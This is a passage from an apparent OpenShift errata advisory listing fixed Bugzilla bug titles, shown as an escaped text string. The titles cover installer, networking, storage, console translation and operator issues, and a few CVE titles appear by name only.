Machine API deletion does not properly handle stopped instances on AWS or GCP\n1905849 - Default volumesnapshotclass should be created when creating default storageclass\n1906056 - Bundles skipped via the `skips` field cannot be pinned\n1906102 - CBO produces standard metrics\n1906147 - ironic-rhcos-downloader should not use --insecure\n1906304 - Unexpected value NaN parsing x/y attribute when viewing pod Memory/CPU usage chart\n1906740 - [aws]Machine should be \"Failed\" when creating a machine with invalid region\n1907309 - Migrate controlflow v1alpha1 to v1beta1 in storage\n1907315 - the internal load balancer annotation for AWS should use \"true\" instead of \"0.0.0.0/0\" as value\n1907353 - [4.8] OVS daemonset is wasting resources even though it doesn\u0027t do anything\n1907614 - Update kubernetes deps to 1.20\n1908068 - Enable DownwardAPIHugePages feature gate\n1908169 - The example of Import URL is \"Fedora cloud image list\" for all templates. \n1908170 - sriov network resource injector: Hugepage injection doesn\u0027t work with mult container\n1908343 - Input labels in Manage columns modal should be clickable\n1908378 - [sig-network] pods should successfully create sandboxes by getting pod - Static Pod Failures\n1908655 - \"Evaluating rule failed\" for \"record: node:node_num_cpu:sum\" rule\n1908762 - [Dualstack baremetal cluster] multicast traffic is not working on ovn-kubernetes\n1908765 - [SCALE] enable OVN lflow data path groups\n1908774 - [SCALE] enable OVN DB memory trimming on compaction\n1908916 - CNO: turn on OVN DB RAFT diffs once all master DB pods are capable of it\n1909091 - Pod/node/ip/template isn\u0027t showing when vm is running\n1909600 - Static pod installer controller deadlocks with non-existing installer pod, WAS: kube-apisrever of clsuter operator always with incorrect status due to pleg error\n1909849 - release-openshift-origin-installer-e2e-aws-upgrade-fips-4.4 is perm failing\n1909875 - [sig-cluster-lifecycle] Cluster version operator acknowledges upgrade : timed out waiting for cluster to acknowledge upgrade\n1910067 - UPI: openstacksdk fails on \"server group list\"\n1910113 - periodic-ci-openshift-release-master-ocp-4.5-ci-e2e-44-stable-to-45-ci is never passing\n1910318 - OC 4.6.9 Installer failed: Some pods are not scheduled: 3 node(s) didn\u0027t match node selector: AWS compute machines without status\n1910378 - socket timeouts for webservice communication between pods\n1910396 - 4.6.9 cred operator should back-off when provisioning fails on throttling\n1910500 - Could not list CSI provisioner on web when create storage class on GCP platform\n1911211 - Should show the cert-recovery-controller version  correctly\n1911470 - ServiceAccount Registry Authfiles Do Not Contain Entries for Public Hostnames\n1912571 - libvirt: Support setting dnsmasq options through the install config\n1912820 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade\n1913112 - BMC details should be optional for unmanaged hosts\n1913338 - CVE-2020-28852 golang.org/x/text: Panic in language.ParseAcceptLanguage while processing bcp47 tag\n1913341 - GCP: strange cluster behavior in CI run\n1913399 - switch to v1beta1 for the priority and fairness APIs\n1913525 - Panic in OLM packageserver when invoking webhook authorization endpoint\n1913532 - After a 4.6 to 4.7 upgrade, a node went unready\n1913974 - snapshot test periodically failing with \"can\u0027t open \u0027/mnt/test/data\u0027: No such file or directory\"\n1914127 - Deletion of oc get svc router-default -n openshift-ingress hangs\n1914446 - openshift-service-ca-operator and openshift-service-ca pods run as root\n1914994 - Panic observed in k8s-prometheus-adapter since k8s 1.20\n1915122 - Size of the hostname was preventing proper DNS resolution of the worker node names\n1915693 - Not able to install gpu-operator on cpumanager enabled node. \n1915971 - Role and Role Binding breadcrumbs do not work as expected\n1916116 - the left navigation menu would not be expanded if repeat clicking the links in Overview page\n1916118 - [OVN] Source IP is not EgressIP if configured allow 0.0.0.0/0 in the EgressFirewall\n1916392 - scrape priority and fairness endpoints for must-gather\n1916450 - Alertmanager: add title and text fields to Adv. config. section of Slack Receiver form\n1916489 - [sig-scheduling] SchedulerPriorities [Serial] fails with \"Error waiting for 1 pods to be running - probably a timeout: Timeout while waiting for pods with labels to be ready\"\n1916553 - Default template\u0027s description is empty on details tab\n1916593 - Destroy cluster sometimes stuck in a loop\n1916872 - need ability to reconcile exgw annotations on pod add\n1916890 - [OCP 4.7] api or api-int not available during installation\n1917241 - [en_US] The tooltips of Created date time is not easy to read in all most of UIs. \n1917282 - [Migration] MCO stucked for rhel worker after  enable the migration prepare state\n1917328 - It should default to current namespace when create vm from template action on details page\n1917482 - periodic-ci-openshift-release-master-ocp-4.7-e2e-metal-ipi failing with \"cannot go from state \u0027deploy failed\u0027 to state \u0027manageable\u0027\"\n1917485 - [oVirt] ovirt machine/machineset object has missing some field validations\n1917667 - Master machine config pool updates are stalled during the migration from SDN to OVNKube. \n1917906 - [oauth-server] bump k8s.io/apiserver to 1.20.3\n1917931 - [e2e-gcp-upi] failing due to missing pyopenssl library\n1918101 - [vsphere]Delete Provisioning machine took about 12 minutes\n1918376 - Image registry pullthrough does not support ICSP, mirroring e2es do not pass\n1918442 - Service Reject ACL does not work on dualstack\n1918723 - installer fails to write boot record on 4k scsi lun on s390x\n1918729 - Add hide/reveal button for the token field in the KMS configuration page\n1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve\n1918785 - Pod request and limit calculations in console are incorrect\n1918910 - Scale from zero annotations should not requeue if instance type missing\n1919032 - oc image extract - will not extract files from image rootdir - \"error: unexpected directory from mapping tests.test\"\n1919048 - Whereabouts IPv6 addresses not calculated when leading hextets equal 0\n1919151 - [Azure] dnsrecords with invalid domain should not be published to Azure dnsZone\n1919168 - `oc adm catalog mirror` doesn\u0027t work for the air-gapped cluster\n1919291 - [Cinder-csi-driver] Filesystem did not expand for on-line volume resize\n1919336 - vsphere-problem-detector should check if datastore is part of datastore cluster\n1919356 - Add missing profile annotation in cluster-update-keys manifests\n1919391 - CVE-2021-20206 containernetworking-cni: Arbitrary path injection via type field in CNI configuration\n1919398 - Permissive Egress NetworkPolicy (0.0.0.0/0) is blocking all traffic\n1919406 - OperatorHub filter heading \"Provider Type\" should be \"Source\"\n1919737 - hostname lookup delays when master node down\n1920209 - Multus daemonset upgrade takes the longest time in the cluster during an upgrade\n1920221 - GCP jobs exhaust zone listing query quota sometimes due to too many initializations of cloud provider in tests\n1920300 - cri-o does not support configuration of stream idle time\n1920307 - \"VM not running\" should be \"Guest agent required\" on vm details page in dev console\n1920532 - Problem in trying to connect through the service to a member that is the same as the caller. \n1920677 - Various missingKey errors in the devconsole namespace\n1920699 - Operation cannot be fulfilled on clusterresourcequotas.quota.openshift.io error when creating different OpenShift resources\n1920901 - [4.7]\"500 Internal Error\" for prometheus route in https_proxy cluster\n1920903 - oc adm top reporting unknown status for Windows node\n1920905 - Remove DNS lookup workaround from cluster-api-provider\n1921106 - A11y Violation: button name(s) on Utilization Card on Cluster Dashboard\n1921184 - kuryr-cni binds to wrong interface on machine with two interfaces\n1921227 - Fix issues related to consuming new extensions in Console static plugins\n1921264 - Bundle unpack jobs can hang indefinitely\n1921267 - ResourceListDropdown not internationalized\n1921321 - SR-IOV obliviously reboot the node\n1921335 - ThanosSidecarUnhealthy\n1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation\n1921720 - test: openshift-tests.[sig-cli] oc observe works as expected [Suite:openshift/conformance/parallel]\n1921763 - operator registry has high memory usage in 4.7... cleanup row closes\n1921778 - Push to stage now failing with semver issues on old releases\n1921780 - Search page not fully internationalized\n1921781 - DefaultList component not internationalized\n1921878 - [kuryr] Egress network policy with namespaceSelector in Kuryr behaves differently than in OVN-Kubernetes\n1921885 - Server-side Dry-run with Validation Downloads Entire OpenAPI spec often\n1921892 - MAO: controller runtime manager closes event recorder\n1921894 - Backport Avoid node disruption when kube-apiserver-to-kubelet-signer is rotated\n1921937 - During upgrade /etc/hostname becomes a directory, nodes are set with kubernetes.io/hostname=localhost label\n1921953 - ClusterServiceVersion property inference does not infer package and version\n1922063 - \"Virtual Machine\" should be \"Templates\" in template wizard\n1922065 - Rootdisk size is default to 15GiB in customize wizard\n1922235 - [build-watch] e2e-aws-upi - e2e-aws-upi container setup failing because of Python code version mismatch\n1922264 - Restore snapshot as a new PVC: RWO/RWX access modes are not click-able if parent PVC is deleted\n1922280 - [v2v] on the upstream release, In VM import wizard I see RHV but no oVirt\n1922646 - Panic in authentication-operator invoking webhook authorization\n1922648 - FailedCreatePodSandBox due to \"failed to pin namespaces [uts]: [pinns:e]: /var/run/utsns exists and is not a directory: File exists\"\n1922764 - authentication operator is degraded due to number of kube-apiservers\n1922992 - some button text on YAML sidebar are not translated\n1922997 - [Migration]The SDN migration rollback failed. \n1923038 - [OSP] Cloud Info is loaded twice\n1923157 - Ingress traffic performance drop due to NodePort services\n1923786 - RHV UPI fails with unhelpful message when ASSET_DIR is not set. \n1923811 - Registry claims Available=True despite .status.readyReplicas == 0  while .spec.replicas == 2\n1923847 - Error occurs when creating pods if configuring multiple key-only labels in default cluster-wide node selectors or project-wide node selectors\n1923984 - Incorrect anti-affinity for UWM prometheus\n1924020 - panic: runtime error: index out of range [0] with length 0\n1924075 - kuryr-controller restart when enablePortPoolsPrepopulation = true\n1924083 - \"Activity\" Pane of Persistent Storage tab shows events related to Noobaa too\n1924140 - [OSP] Typo in OPENSHFIT_INSTALL_SKIP_PREFLIGHT_VALIDATIONS variable\n1924171 - ovn-kube must handle single-stack to dual-stack migration\n1924358 - metal UPI setup fails, no worker nodes\n1924502 - Failed to start transient scope unit: Argument list too long / systemd[1]: Failed to set up mount unit: Invalid argument\n1924536 - \u0027More about Insights\u0027 link points to support link\n1924585 - \"Edit Annotation\" are not correctly translated in Chinese\n1924586 - Control Plane status and Operators status are not fully internationalized\n1924641 - [User Experience] The message \"Missing storage class\" needs to be displayed after user clicks Next and needs to be rephrased\n1924663 - Insights operator should collect related pod logs when operator is degraded\n1924701 - Cluster destroy fails when using byo with Kuryr\n1924728 - Difficult to identify deployment issue if the destination disk is too small\n1924729 - Create Storageclass for CephFS provisioner assumes incorrect default FSName in external mode (side-effect of fix for Bug 1878086)\n1924747 - InventoryItem doesn\u0027t internationalize resource kind\n1924788 - Not clear error message when there are no NADs available for the user\n1924816 - Misleading error messages in ironic-conductor log\n1924869 - selinux avc deny after installing OCP 4.7\n1924916 - PVC reported as Uploading when it is actually cloning\n1924917 - kuryr-controller in crash loop if IP is removed from secondary interfaces\n1924953 - newly added \u0027excessive etcd leader changes\u0027 test case failing in serial job\n1924968 - Monitoring list page filter options are not translated\n1924983 - some components in utils directory not localized\n1925017 - [UI] VM Details-\u003e Network Interfaces, \u0027Name,\u0027 is displayed instead on \u0027Name\u0027\n1925061 - Prometheus backed by a PVC may start consuming a lot of RAM after 4.6 -\u003e 4.7 upgrade due to series churn\n1925083 - Some texts are not marked for translation on idp creation page. \n1925087 - Add i18n support for the Secret page\n1925148 - Shouldn\u0027t create the redundant imagestream when use `oc new-app --name=testapp2 -i ` with exist imagestream\n1925207 - VM from custom template - cloudinit disk is not added if creating the VM from custom template using customization wizard\n1925216 - openshift installer fails immediately failed to fetch Install Config\n1925236 - OpenShift Route targets every port of a multi-port service\n1925245 - oc idle: Clusters upgrading with an idled workload do not have annotations on the workload\u0027s service\n1925261 - Items marked as mandatory in KMS Provider form are not enforced\n1925291 - Baremetal IPI - While deploying with IPv6 provision network with subnet other than /64 masters fail to PXE boot\n1925343 - [ci] e2e-metal tests are not using reserved instances\n1925493 - Enable snapshot e2e tests\n1925586 - cluster-etcd-operator is leaking transports\n1925614 - Error: InstallPlan.operators.coreos.com not found\n1925698 - On GCP, load balancers report kube-apiserver fails its /readyz check 50% of the time, causing load balancer backend churn and disruptions to apiservers\n1926029 - [RFE] Either disable save or give warning when no disks support snapshot\n1926054 - Localvolume CR is created successfully, when the storageclass name defined in the localvolume exists. \n1926072 - Close button (X) does not work in the new \"Storage cluster exists\" Warning alert message(introduced via fix for Bug 1867400)\n1926082 - Insights operator should not go degraded during upgrade\n1926106 - [ja_JP][zh_CN] Create Project, Delete Project and Delete PVC modal are not fully internationalized\n1926115 - Texts in \u201cInsights\u201d popover on overview page are not marked for i18n\n1926123 - Pseudo bug: revert \"force cert rotation every couple days for development\" in 4.7\n1926126 - some kebab/action menu translation issues\n1926131 - Add HPA page is not fully internationalized\n1926146 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it\n1926154 - Create new pool with arbiter - wrong replica\n1926278 - [oVirt] consume K8S 1.20 packages\n1926279 - Pod ignores mtu setting from sriovNetworkNodePolicies in case of PF partitioning\n1926285 - ignore pod not found status messages\n1926289 - Accessibility: Modal content hidden from screen readers\n1926310 - CannotRetrieveUpdates alerts on Critical severity\n1926329 - [Assisted-4.7][Staging] monitoring stack in staging is being overloaded by the amount of metrics being exposed by assisted-installer pods and scraped by prometheus. \n1926336 - Service details can overflow boxes at some screen widths\n1926346 - move to go 1.15 and registry.ci.openshift.org\n1926364 - Installer timeouts because proxy blocked connection to Ironic API running on bootstrap VM\n1926465 - bootstrap kube-apiserver does not have --advertise-address set \u2013 was: [BM][IPI][DualStack] Installation fails cause Kubernetes service doesn\u0027t have IPv6 endpoints\n1926484 - API server exits non-zero on 2 SIGTERM signals\n1926547 - OpenShift installer not reporting IAM permission issue when removing the Shared Subnet Tag\n1926579 - Setting .spec.policy is deprecated and will be removed eventually. Please use .spec.profile instead is being logged every 3 seconds in scheduler operator log\n1926598 - Duplicate alert rules are displayed on console for thanos-querier api return wrong results\n1926776 - \"Template support\" modal appears when select the RHEL6 common template\n1926835 - [e2e][automation] prow gating use unsupported CDI version\n1926843 - pipeline with finally tasks status is improper\n1926867 - openshift-apiserver Available is False with 3 pods not ready for a while during upgrade\n1926893 - When deploying the operator via OLM (after creating the respective catalogsource), the deployment \"lost\" the `resources` section. \n1926903 - NTO may fail to disable stalld when relying on Tuned \u0027[service]\u0027 plugin\n1926931 - Inconsistent ovs-flow rule on one of the app node for egress node\n1926943 - vsphere-problem-detector: Alerts in CI jobs\n1926977 - [sig-devex][Feature:ImageEcosystem][Slow] openshift sample application repositories rails/nodejs\n1927013 - Tables don\u0027t render properly at smaller screen widths\n1927017 - CCO does not relinquish leadership when restarting for proxy CA change\n1927042 - Empty static pod files on UPI deployments are confusing\n1927047 - multiple external gateway pods will not work in ingress with IP fragmentation\n1927068 - Workers fail to PXE boot when IPv6 provisionining network has subnet other than /64\n1927075 - [e2e][automation] Fix pvc string in pvc.view\n1927118 - OCP 4.7: NVIDIA GPU Operator DCGM metrics not displayed in OpenShift Console Monitoring Metrics page\n1927244 - UPI installation with Kuryr timing out on bootstrap stage\n1927263 - kubelet service takes around 43 secs to start container when started from stopped state\n1927264 - FailedCreatePodSandBox due to multus inability to reach apiserver\n1927310 - Performance: Console makes unnecessary requests for en-US messages on load\n1927340 - Race condition in OperatorCondition reconcilation\n1927366 - OVS configuration service unable to clone NetworkManager\u0027s connections in the overlay FS\n1927391 - Fix flake in TestSyncPodsDeletesWhenSourcesAreReady\n1927393 - 4.7 still points to 4.6 catalog images\n1927397 - p\u0026f: add auto update for priority \u0026 fairness bootstrap configuration objects\n1927423 - Happy \"Not Found\" and no visible error messages on error-list page when /silences 504s\n1927465 - Homepage dashboard content not internationalized\n1927678 - Reboot interface defaults to softPowerOff so fencing is too slow\n1927731 - /usr/lib/dracut/modules.d/30ignition/ignition --version sigsev\n1927797 - \u0027Pod(s)\u0027 should be included in the pod donut label when a horizontal pod autoscaler is enabled\n1927882 - Can\u0027t create cluster role binding from UI when a project is selected\n1927895 - global RuntimeConfig is overwritten with merge result\n1927898 - i18n Admin Notifier\n1927902 - i18n Cluster Utilization dashboard duration\n1927903 - \"CannotRetrieveUpdates\" - critical error in openshift web console\n1927925 - Manually misspelled as Manualy\n1927941 - StatusDescriptor detail item and Status component can cause runtime error when the status is an object or array\n1927942 - etcd should use socket option (SO_REUSEADDR) instead of wait for port release on process restart\n1927944 - cluster version operator cycles terminating state waiting for leader election\n1927993 - Documentation Links in OKD Web Console are not Working\n1928008 - Incorrect behavior when we click back button after viewing the node details in Internal-attached mode\n1928045 - N+1 scaling Info message says \"single zone\" even if the nodes are spread across 2 or 0 zones\n1928147 - Domain search set in the required domains in Option 119 of DHCP Server is ignored by RHCOS on RHV\n1928157 - 4.7 CNO claims to be done upgrading before it even starts\n1928164 - Traffic to outside the cluster redirected when OVN is used and NodePort service is configured\n1928297 - HAProxy fails with 500 on some requests\n1928473 - NetworkManager overlay FS not being created on None platform\n1928512 - sap license management logs gatherer\n1928537 - Cannot IPI with tang/tpm disk encryption\n1928640 - Definite error message when using StorageClass based on azure-file / Premium_LRS\n1928658 - Update plugins and Jenkins version to prepare openshift-sync-plugin 1.0.46 release\n1928850 - Unable to pull images due to limited quota on Docker Hub\n1928851 - manually creating NetNamespaces will break things and this is not obvious\n1928867 - golden images - DV should not be created with WaitForFirstConsumer\n1928869 - Remove css required to fix search bug in console caused by pf issue in 2021.1\n1928875 - Update translations\n1928893 - Memory Pressure Drop Down Info is stating \"Disk\" capacity is low instead of memory\n1928931 - DNSRecord CRD is using deprecated v1beta1 API\n1928937 - CVE-2021-23337 nodejs-lodash: command injection via template\n1928954 - CVE-2020-28500 nodejs-lodash: ReDoS via the toNumber, trim and trimEnd functions\n1929052 - Add new Jenkins agent maven dir for 3.6\n1929056 - kube-apiserver-availability.rules are failing evaluation\n1929110 - LoadBalancer service check test fails during vsphere upgrade\n1929136 - openshift isn\u0027t able to mount nfs manila shares to pods\n1929175 - LocalVolumeSet: PV is created on disk belonging to other provisioner\n1929243 - Namespace column missing in Nodes Node Details / pods tab\n1929277 - Monitoring workloads using too high a priorityclass\n1929281 - Update Tech Preview badge to transparent border color when upgrading to PatternFly v4.87.1\n1929314 - ovn-kubernetes endpoint slice controller doesn\u0027t run on CI jobs\n1929359 - etcd-quorum-guard uses origin-cli [4.8]\n1929577 - Edit Application action overwrites Deployment envFrom values on save\n1929654 - Registry for Azure uses legacy V1 StorageAccount\n1929693 - Pod stuck at \"ContainerCreating\" status\n1929733 - oVirt CSI driver operator is constantly restarting\n1929769 - Getting 404 after switching user perspective in another tab and reload Project details\n1929803 - Pipelines shown in edit flow for Workloads created via ContainerImage flow\n1929824 - fix alerting on volume name check for vsphere\n1929917 - Bare-metal operator is firing for ClusterOperatorDown for 15m during 4.6 to 4.7 upgrade\n1929944 - The etcdInsufficientMembers alert fires incorrectly when any instance is down and not when quorum is lost\n1930007 - filter dropdown item filter and resource list dropdown item filter doesn\u0027t support multi selection\n1930015 - OS list is overlapped by buttons in template wizard\n1930064 - Web console crashes during VM creation from template when no storage classes are defined\n1930220 - Cinder CSI driver is not able to mount volumes under heavier load\n1930240 - Generated clouds.yaml incomplete when provisioning network is disabled\n1930248 - After creating a remediation flow and rebooting a worker there is no access to the openshift-web-console\n1930268 - intel vfio devices are not expose as resources\n1930356 - Darwin binary missing from mirror.openshift.com\n1930393 - Gather info about unhealthy SAP pods\n1930546 - Monitoring-dashboard-workload keep loading when user with cluster-role cluster-monitoring-view login develoer console\n1930570 - Jenkins templates are displayed in Developer Catalog twice\n1930620 - the logLevel field in containerruntimeconfig can\u0027t be set to \"trace\"\n1930631 - Image local-storage-mustgather in the doc does not come from product registry\n1930893 - Backport upstream patch 98956 for pod terminations\n1931005 - Related objects page doesn\u0027t show the object when its name is empty\n1931103 - remove periodic log within kubelet\n1931115 - Azure cluster install fails with worker type workers Standard_D4_v2\n1931215 - [RFE] Cluster-api-provider-ovirt should handle affinity groups\n1931217 - [RFE] Installer should create RHV Affinity group for OCP cluster VMS\n1931467 - Kubelet consuming a large amount of CPU and memory and node becoming unhealthy\n1931505 - [IPI baremetal] Two nodes hold the VIP post remove and start  of the Keepalived container\n1931522 - Fresh UPI install on BM with bonding using OVN Kubernetes fails\n1931529 - SNO: mentioning of 4 nodes in error message - Cluster network CIDR prefix 24 does not contain enough addresses for 4 hosts each one with 25 prefix (128 addresses)\n1931629 - Conversational Hub Fails due to ImagePullBackOff\n1931637 - Kubeturbo Operator fails due to ImagePullBackOff\n1931652 - [single-node] etcd: discover-etcd-initial-cluster graceful termination race. \n1931658 - [single-node] cluster-etcd-operator: cluster never pivots from bootstrapIP endpoint\n1931674 - [Kuryr] Enforce nodes MTU for the Namespaces and Pods\n1931852 - Ignition HTTP GET is failing, because DHCP IPv4 config is failing silently\n1931883 - Fail to install Volume Expander Operator due to CrashLookBackOff\n1931949 - Red Hat  Integration Camel-K Operator keeps stuck in Pending state\n1931974 - Operators cannot access kubeapi endpoint on OVNKubernetes on ipv6\n1931997 - network-check-target causes upgrade to fail from 4.6.18 to 4.7\n1932001 - Only one of multiple subscriptions to the same package is honored\n1932097 - Apiserver liveness probe is marking it as unhealthy during normal shutdown\n1932105 - machine-config ClusterOperator claims level while control-plane still updating\n1932133 - AWS EBS CSI Driver doesn\u2019t support \u201ccsi.storage.k8s.io/fsTyps\u201d parameter\n1932135 - When \u201ciopsPerGB\u201d parameter is not set, event for AWS EBS CSI Driver provisioning is not clear\n1932152 - When \u201ciopsPerGB\u201d parameter is set to a wrong number, events for AWS EBS CSI Driver provisioning are not clear\n1932154 - [AWS ] machine stuck in provisioned phase , no warnings or errors\n1932182 - catalog operator causing CPU spikes and bad etcd performance\n1932229 - Can\u2019t find kubelet metrics for aws ebs csi volumes\n1932281 - [Assisted-4.7][UI] Unable to change upgrade channel once upgrades were discovered\n1932323 - CVE-2021-26540 sanitize-html: improper validation of hostnames set by the \"allowedIframeHostnames\" option can lead to bypass hostname whitelist for iframe element\n1932324 - CRIO fails to create a Pod in sandbox stage -  starting container process caused: process_linux.go:472: container init caused: Running hook #0:: error running hook: exit status 255, stdout: , stderr: \\\"\\n\"\n1932362 - CVE-2021-26539 sanitize-html: improper handling of internationalized domain name (IDN) can lead to bypass hostname whitelist validation\n1932401 - Cluster Ingress Operator degrades if external LB redirects http to https because of new \"canary\" route\n1932453 - Update Japanese timestamp format\n1932472 - Edit Form/YAML switchers cause weird collapsing/code-folding issue\n1932487 - [OKD] origin-branding manifest is missing cluster profile annotations\n1932502 - Setting MTU for a bond interface using Kernel arguments is not working\n1932618 - Alerts during a test run should fail the test job, but were not\n1932624 - ClusterMonitoringOperatorReconciliationErrors is pending at the end of an upgrade and probably should not be\n1932626 - During a 4.8 GCP upgrade OLM fires an alert indicating the operator is unhealthy\n1932673 - Virtual machine template provided by red hat should not be editable. The UI allows to edit and then reverse the change after it was made\n1932789 - Proxy with port is unable to be validated if it overlaps with service/cluster network\n1932799 - During a hive driven baremetal installation the process does not go beyond 80% in the bootstrap VM\n1932805 - e2e: test OAuth API connections in the tests by that name\n1932816 - No new local storage operator bundle image is built\n1932834 - enforce the use of hashed access/authorize tokens\n1933101 - Can not upgrade a Helm Chart that uses a library chart in the OpenShift dev console\n1933102 - Canary daemonset uses default node selector\n1933114 - [sig-network-edge][Conformance][Area:Networking][Feature:Router] The HAProxy router should be able to connect to a service that is idled because a GET on the route will unidle it [Suite:openshift/conformance/parallel/minimal]\n1933159 - multus DaemonSets should use maxUnavailable: 33%\n1933173 - openshift-sdn/sdn DaemonSet should use maxUnavailable: 10%\n1933174 - openshift-sdn/ovs DaemonSet should use maxUnavailable: 10%\n1933179 - network-check-target DaemonSet should use maxUnavailable: 10%\n1933180 - openshift-image-registry/node-ca DaemonSet should use maxUnavailable: 10%\n1933184 - openshift-cluster-csi-drivers DaemonSets should use maxUnavailable: 10%\n1933263 - user manifest with nodeport services causes bootstrap to block\n1933269 - Cluster unstable replacing an unhealthy etcd member\n1933284 - Samples in CRD creation are ordered arbitarly\n1933414 - Machines are created with unexpected name for Ports\n1933599 - bump k8s.io/apiserver to 1.20.3\n1933630 - [Local Volume] Provision disk failed when disk label has unsupported value like \":\"\n1933664 - Getting Forbidden for image in a container template when creating a sample app\n1933708 - Grafana is not displaying deployment config resources in dashboard `Default /Kubernetes / Compute Resources / Namespace (Workloads)`\n1933711 - EgressDNS: Keep short lived records at most 30s\n1933730 - [AI-UI-Wizard] Toggling \"Use extra disks for local storage\" checkbox highlights the \"Next\" button to move forward but grays out once clicked\n1933761 - Cluster DNS service caps TTLs too low and thus evicts from its cache too aggressively\n1933772 - MCD Crash Loop Backoff\n1933805 - TargetDown alert fires during upgrades because of normal upgrade behavior\n1933857 - Details page can throw an uncaught exception if kindObj prop is undefined\n1933880 - Kuryr-Controller crashes when it\u0027s missing the status object\n1934021 - High RAM usage on machine api termination node system oom\n1934071 - etcd consuming high amount of  memory and CPU after upgrade to 4.6.17\n1934080 - Both old and new Clusterlogging CSVs stuck in Pending during upgrade\n1934085 - Scheduling conformance tests failing in a single node cluster\n1934107 - cluster-authentication-operator builds URL incorrectly for IPv6\n1934112 - Add memory and uptime metadata to IO archive\n1934113 - mcd panic when there\u0027s not enough free disk space\n1934123 - [OSP] First public endpoint is used to fetch ignition config from Glance URL (with multiple endpoints) on OSP\n1934163 - Thanos Querier restarting and gettin alert ThanosQueryHttpRequestQueryRangeErrorRateHigh\n1934174 - rootfs too small when enabling NBDE\n1934176 - Machine Config Operator degrades during cluster update with failed to convert Ignition config spec v2 to v3\n1934177 - knative-camel-operator  CreateContainerError \"container_linux.go:366: starting container process caused: chdir to cwd (\\\"/home/nonroot\\\") set in config.json failed: permission denied\"\n1934216 - machineset-controller stuck in CrashLoopBackOff after upgrade to 4.7.0\n1934229 - List page text filter has input lag\n1934397 - Extend OLM operator gatherer to include Operator/ClusterServiceVersion conditions\n1934400 - [ocp_4][4.6][apiserver-auth] OAuth API servers are not ready - PreconditionNotReady\n1934516 - Setup different priority classes for prometheus-k8s and prometheus-user-workload pods\n1934556 - OCP-Metal images\n1934557 - RHCOS boot image bump for LUKS fixes\n1934643 - Need BFD failover capability on ECMP routes\n1934711 - openshift-ovn-kubernetes ovnkube-node DaemonSet should use maxUnavailable: 10%\n1934773 - Canary client should perform canary probes explicitly over HTTPS (rather than redirect from HTTP)\n1934905 - CoreDNS\u0027s \"errors\" plugin is not enabled for custom upstream resolvers\n1935058 - Can\u2019t finish install sts clusters on aws government region\n1935102 - Error: specifying a root certificates file with the insecure flag is not allowed during oc login\n1935155 - IGMP/MLD packets being dropped\n1935157 - [e2e][automation] environment tests broken\n1935165 - OCP 4.6 Build fails when filename contains an umlaut\n1935176 - Missing an indication whether the deployed setup is SNO. \n1935269 - Topology operator group shows child Jobs. Not shown in details view\u0027s resources. \n1935419 - Failed to scale worker using virtualmedia on Dell R640\n1935528 - [AWS][Proxy] ingress reports degrade with CanaryChecksSucceeding=False in the cluster with proxy setting\n1935539 - Openshift-apiserver CO unavailable during cluster upgrade from 4.6 to 4.7\n1935541 - console operator panics in DefaultDeployment with nil cm\n1935582 - prometheus liveness probes cause issues while replaying WAL\n1935604 - high CPU usage fails ingress controller\n1935667 - pipelinerun status icon rendering issue\n1935706 - test: Detect when the master pool is still updating after upgrade\n1935732 - Update Jenkins agent maven directory to be version agnostic [ART ocp build data]\n1935814 - Pod and Node lists eventually have incorrect row heights when additional columns have long text\n1935909 - New CSV using ServiceAccount named \"default\" stuck in Pending during upgrade\n1936022 - DNS operator performs spurious updates in response to API\u0027s defaulting of daemonset\u0027s terminationGracePeriod and service\u0027s clusterIPs\n1936030 - Ingress operator performs spurious updates in response to API\u0027s defaulting of NodePort service\u0027s clusterIPs field\n1936223 - The IPI installer has a typo. It is missing the word \"the\" in \"the Engine\". \n1936336 - Updating multus-cni builder \u0026 base images to be consistent with ART 4.8 (closed)\n1936342 - kuryr-controller restarting after 3 days cluster running - pools without members\n1936443 - Hive based OCP IPI baremetal installation fails to connect to API VIP port 22623\n1936488 - [sig-instrumentation][Late] Alerts shouldn\u0027t report any alerts in firing state apart from Watchdog and AlertmanagerReceiversNotConfigured: Prometheus query error\n1936515 - sdn-controller is missing some health checks\n1936534 - When creating a worker with a used mac-address stuck on registering\n1936585 - configure alerts if the catalogsources are missing\n1936620 - OLM checkbox descriptor renders switch instead of checkbox\n1936721 - network-metrics-deamon not associated with a priorityClassName\n1936771 - [aws ebs csi driver] The event for Pod consuming a readonly PVC is not clear\n1936785 - Configmap gatherer doesn\u0027t include namespace name (in the archive path) in case of a configmap with binary data\n1936788 - RBD RWX PVC creation with  Filesystem volume mode selection is creating RWX PVC with Block volume mode instead of disabling Filesystem volume mode selection\n1936798 - Authentication log gatherer shouldn\u0027t scan all the pod logs in the openshift-authentication namespace\n1936801 - Support ServiceBinding 0.5.0+\n1936854 - Incorrect imagestream is shown as selected in knative service container image edit flow\n1936857 - e2e-ovirt-ipi-install-install is permafailing on 4.5 nightlies\n1936859 - ovirt 4.4 -\u003e 4.5 upgrade jobs are permafailing\n1936867 - Periodic vsphere IPI install is broken - missing pip\n1936871 - [Cinder CSI] Topology aware provisioning doesn\u0027t work when Nova and Cinder AZs are different\n1936904 - Wrong output YAML when syncing groups without --confirm\n1936983 - Topology view - vm details screen isntt stop loading\n1937005 - when kuryr quotas are unlimited, we should not sent alerts\n1937018 - FilterToolbar component does not handle \u0027null\u0027 value for \u0027rowFilters\u0027 prop\n1937020 - Release new from image stream chooses incorrect ID based on status\n1937077 - Blank White page on Topology\n1937102 - Pod Containers Page Not Translated\n1937122 - CAPBM changes to support flexible reboot modes\n1937145 - [Local storage] PV provisioned by localvolumeset stays in \"Released\" status after the pod/pvc deleted\n1937167 - [sig-arch] Managed cluster should have no crashlooping pods in core namespaces over four minutes\n1937244 - [Local Storage] The model name of aws EBS doesn\u0027t be extracted well\n1937299 - pod.spec.volumes.awsElasticBlockStore.partition is not respected on NVMe volumes\n1937452 - cluster-network-operator CI linting fails in master branch\n1937459 - Wrong Subnet retrieved for Service without Selector\n1937460 - [CI] Network quota pre-flight checks are failing the installation\n1937464 - openstack cloud credentials are not getting configured with correct user_domain_name across the cluster\n1937466 - KubeClientCertificateExpiration alert is confusing, without explanation in the documentation\n1937496 - Metrics viewer in OCP Console is missing date in a timestamp for selected datapoint\n1937535 - Not all image pulls within OpenShift builds retry\n1937594 - multiple pods in ContainerCreating state after migration from OpenshiftSDN to OVNKubernetes\n1937627 - 